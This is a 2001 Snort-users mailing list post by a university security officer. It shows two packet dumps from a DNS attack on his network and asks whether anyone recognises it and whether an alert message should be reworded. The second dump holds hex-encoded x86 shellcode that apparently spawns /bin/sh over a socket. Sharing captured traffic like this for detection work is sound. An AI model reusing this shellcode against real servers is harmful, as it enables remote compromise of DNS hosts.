[Snort-users] DNS attack triggers snort 'RPC EXPLOIT statdx' alert

Russell Fulton r.fulton at ...3809...
Sun Nov 25 14:20:02 EST 2001


I'm posting this to both incidents and snort-users -- aplogies to those 
who see this twice.

Here are a couple of packet dumps captured by snort from a single dns 
session.  The second represents what looks like shell code and triggers
the 'RPC EXPLOIT statdx' alert in snort. 

Perhaps the snort rule alert message should be changed to be less 
specific or another rule added that is specifc to port 53 with an 
approriate message.

Does anyone recognise this attack?

Cheers, Russell.

[**] DNS named iquery attempt [**]
11/24-00:51:18.968347 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 
len:0x1FB
209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11539 
IpLen:20 DgmLen:493
Len: 473
2F A6 09 80 00 00 00 01 00 00 00 00 3E 41 41 41  /...........>AAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 3E 42 42 42 42  AAAAAAAAAAA>BBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 3E 43 43 43 43 43  BBBBBBBBBB>CCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 3E 00 01 02 03 04 05  CCCCCCCCC>......
06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15  ................
16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25  .......... !"#$%
26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35  &'()*+,-./012345
36 37 38 39 3A 3B 3C 3D 3E 45 45 45 45 45 45 45  6789:;<=>EEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 3E 46 46 46 46 46 46 46 46  EEEEEEE>FFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 3D 47 47 47 47 47 47 47 47 47  FFFFFF=GGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 00 00 01 00 01 00 00 00 01 00 FF 40  GGGG...........@
66                                               f

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] RPC EXPLOIT statdx [**]
11/24-00:51:19.186260 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 
len:0x228
209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11543 
IpLen:20 DgmLen:538
Len: 518
2F A6 00 00 00 01 00 00 00 00 00 01 3C 90 89 E6  /...........<...
83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0  .. at ...4145...
31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46  1..F..F.1..F(@.F
24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66  $@.F .N 1.C1...f
51 53 50 CD 80 89 46 20 90 3C 90 8D 06 89 46 24  QSP...F .<....F$
31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20  1.....F(X[YCC.v 
CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD D1 EB  ..[Ot2..$.F.....
08 76 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00  .v.n.....5......
8D 0E 31 D2 83 C2 0C CD 80 C7 06 02 00 61 A9 89  ..1..........a..
6E 04 90 31 FF 47 EB 88 90 31 C0 83 C0 3F 31 C9  n..1.G...1...?1.
50 CD 80 58 41 CD 80 C7 06 2F 62 69 6E C7 46 04  P..XA..../bin.F.
2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46  /sh.......F.1..F
0C B0 0B 8D 56 0C 8D 4E 08 89 F3 CD 80 31 C0 40  ....V..N.....1.@
CD 80 3E 41 41 41 41 41 41 41 41 41 41 41 41 41  ..>AAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 3E 42 42 42 42 42 42 42 42 42 42 42 42 42 42  A>BBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
03 43 43 43 10 06 00 00 00 B7 FD FF FF E3 FF FF  .CCC............
FF 00 FF FF FF 3E 41 41 41 41 41 41 41 41 41 41  .....>AAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 3E 42 42 42 42 42 42 42 42 42 42 42  AAAA>BBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 10 43 43 43 43 43 43 43 43 43 43 43 43  BBB.CCCCCCCCCCCC
43 43 43 43 00 00 01 00 01 00 00 FA 00 FF        CCCC..........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand





More information about the Snort-users mailing list